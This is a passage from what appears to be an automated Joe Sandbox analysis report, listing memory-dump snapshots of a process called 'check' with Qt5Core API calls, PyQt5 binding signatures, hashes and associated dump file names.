                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: List@$?persistentAbstractIndexIndex@@@@ItemModelModel@@malloc
                                                                                                                                                                                                                • String ID: QConcatenateTablesProxyModel$persistentIndexList$persistentIndexList(self) -> List[QModelIndex]
                                                                                                                                                                                                                • API String ID: 23101366-3063918673
                                                                                                                                                                                                                • Opcode ID: ef55e25100c8e599cacec2675e05120d1f6b3615a48cb3640e1072cdac1aeba0
                                                                                                                                                                                                                • Instruction ID: f8dc6092020faec7d6e96e77a38ecece31649da6c56c120f6ea727f26fd40605
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef55e25100c8e599cacec2675e05120d1f6b3615a48cb3640e1072cdac1aeba0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45115AB5A19B8681DB40DF26E88CBA933A4FB48B80F995032CA4D17720DF7DD509C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?key@QSystemSemaphore@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFB02F623F8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?key@Semaphore@@String@@Systemmalloc
                                                                                                                                                                                                                • String ID: QSystemSemaphore$key$key(self) -> str
                                                                                                                                                                                                                • API String ID: 2127427083-950138476
                                                                                                                                                                                                                • Opcode ID: 82e25a526f1c280048bfb656eb2ce0e6b6bceb44c3e40025ae4eac023f36a10f
                                                                                                                                                                                                                • Instruction ID: f04a69094c676f14e58a7244b699bc19970248884d40998ecd91f61382ff67f2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82e25a526f1c280048bfb656eb2ce0e6b6bceb44c3e40025ae4eac023f36a10f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 931117B5A19A4681EB40DF79E84CBA933A4FB88F84F994032CA5D17720EF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?methodSignature@QMetaMethod@@QEBA?AVQByteArray@@XZ.QT5CORE ref: 00007FFB02FF6448
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?methodArray@@ByteMetaMethod@@Signature@malloc
                                                                                                                                                                                                                • String ID: QMetaMethod$methodSignature$methodSignature(self) -> QByteArray
                                                                                                                                                                                                                • API String ID: 1596601967-758810800
                                                                                                                                                                                                                • Opcode ID: 9a353fc955c5c4d9672b7710cd952a4320d21435ee536201555da78c67f4daaa
                                                                                                                                                                                                                • Instruction ID: 2704d14b266009558ebea9e3bf9896260a0d74e9b75c7216c9ee57bb4125709b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a353fc955c5c4d9672b7710cd952a4320d21435ee536201555da78c67f4daaa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30111BB5A05A4681EB40DF75E84CBA933B4FB48B80F9A4032CA5D17365DF7DD549C340
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?filePath@QTranslator@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFB02F5C468
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?filePath@String@@Translator@@malloc
                                                                                                                                                                                                                • String ID: QTranslator$filePath$filePath(self) -> str
                                                                                                                                                                                                                • API String ID: 790529490-1161567257
                                                                                                                                                                                                                • Opcode ID: c77a870383b8b5e0cd035d1e87ea0980b1a1ed67665d13d36dbac7ae68f0064b
                                                                                                                                                                                                                • Instruction ID: 89c8da12704d17ea4bbf6379e4673e39232f196ebe092a38ad66659a20817172
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c77a870383b8b5e0cd035d1e87ea0980b1a1ed67665d13d36dbac7ae68f0064b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43111BB5A09A4681EB40DF75E84CBA933A4FB88B80F954032CA5D17360EF7DE549C380
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?result@QMessageAuthenticationCode@@QEBA?AVQByteArray@@XZ.QT5CORE ref: 00007FFB02FFE468
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?result@Array@@AuthenticationByteCode@@Messagemalloc
                                                                                                                                                                                                                • String ID: QMessageAuthenticationCode$result$result(self) -> QByteArray
                                                                                                                                                                                                                • API String ID: 866259572-1386211867
                                                                                                                                                                                                                • Opcode ID: 25fcc2a46b8ecd527d69ace433f790f5737b16d1f308960f6e0a9a6714b4a361
                                                                                                                                                                                                                • Instruction ID: 890075519ca3e8f6212e888ea0256cf3f80530923be36dcb1e8a357be7416dbc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25fcc2a46b8ecd527d69ace433f790f5737b16d1f308960f6e0a9a6714b4a361
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A111BB6A19A4681EB40DF75E84CBA933A4FB88F80F995032C95D17720EF7DD549C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setApplicationVersion@QCoreApplication@@SAXAEBVQString@@@Z.QT5CORE ref: 00007FFB02FD046C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setApplicationApplication@@CoreString@@@Version@
                                                                                                                                                                                                                • String ID: QCoreApplication$setApplicationVersion$setApplicationVersion(version: Optional[str])
                                                                                                                                                                                                                • API String ID: 4177189034-846569061
                                                                                                                                                                                                                • Opcode ID: 2970a5d21bd9a58a201af6fa999e3b37964154c0ecb71e9f4188a79309e5deae
                                                                                                                                                                                                                • Instruction ID: d1dc7becac9ef74f65cdacb9c307fd91cde0bbb4846826dda8471689fd0694de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2970a5d21bd9a58a201af6fa999e3b37964154c0ecb71e9f4188a79309e5deae
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B1121B5A19F46C5DB409F25E848AAA73B0FB88B84F445032D98D63734EF7CE155C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?startValue@QVariantAnimation@@QEBA?AVQVariant@@XZ.QT5CORE ref: 00007FFB02F84488
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?startAnimation@@Value@VariantVariant@@malloc
                                                                                                                                                                                                                • String ID: QVariantAnimation$startValue$startValue(self) -> Any
                                                                                                                                                                                                                • API String ID: 1169036886-808798260
                                                                                                                                                                                                                • Opcode ID: f2012c0f0d47f9d50960a847ad8ac6a36fb5c5e314c264ac2720a598524167cc
                                                                                                                                                                                                                • Instruction ID: 478da86f6aaf5d07462960a61e11e0e3f2e6caeffb433547f2d452e6aefc86a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2012c0f0d47f9d50960a847ad8ac6a36fb5c5e314c264ac2720a598524167cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A1129B5A09B4681EB40DF75E88CBA933A4FB88B84F995032CA5D17320EF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setTransitionType@QAbstractTransition@@QEAAXW4TransitionType@1@@Z.QT5CORE ref: 00007FFB02FE24A2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Transition$?setAbstractTransition@@Type@Type@1@@
                                                                                                                                                                                                                • String ID: QAbstractTransition$setTransitionType$setTransitionType(self, type: QAbstractTransition.TransitionType)
                                                                                                                                                                                                                • API String ID: 1783172816-4164142926
                                                                                                                                                                                                                • Opcode ID: 8ec9e1fe499f4bb21c166a605b3179f8c32406168f42722fc5ad8d0b505cdba8
                                                                                                                                                                                                                • Instruction ID: add20997f9f5cd56a738088c26c33dd17d86929e133db6382472a61c21c77758
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ec9e1fe499f4bb21c166a605b3179f8c32406168f42722fc5ad8d0b505cdba8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB11F5B6A19F4681EB00DF25E888BA933B5FB48B84F954132CA5D13320EF7ED959C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFB03062300: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB02F117F6), ref: 00007FFB0306231A
                                                                                                                                                                                                                • ?filePath@QFileInfo@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFB02FBA308
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?fileFileInfo@@Path@String@@malloc
                                                                                                                                                                                                                • String ID: QFileInfo$filePath$filePath(self) -> str
                                                                                                                                                                                                                • API String ID: 886798261-2625323874
                                                                                                                                                                                                                • Opcode ID: 385149e6963404ca0859bb9e7a77e3502f990fd1edcb65d906ce5f1de14f75d7
                                                                                                                                                                                                                • Instruction ID: 51f645536c3ff6b81c37e8ce7d8bb235a01da937dc4284c54f87fc03a55ca968
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 385149e6963404ca0859bb9e7a77e3502f990fd1edcb65d906ce5f1de14f75d7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4115BB5A09A46C1EB40DF35E84CBA933A4FB48B80F995032CA4E13720EF7DD549C340
                                                                                                                                                                                                                APIs
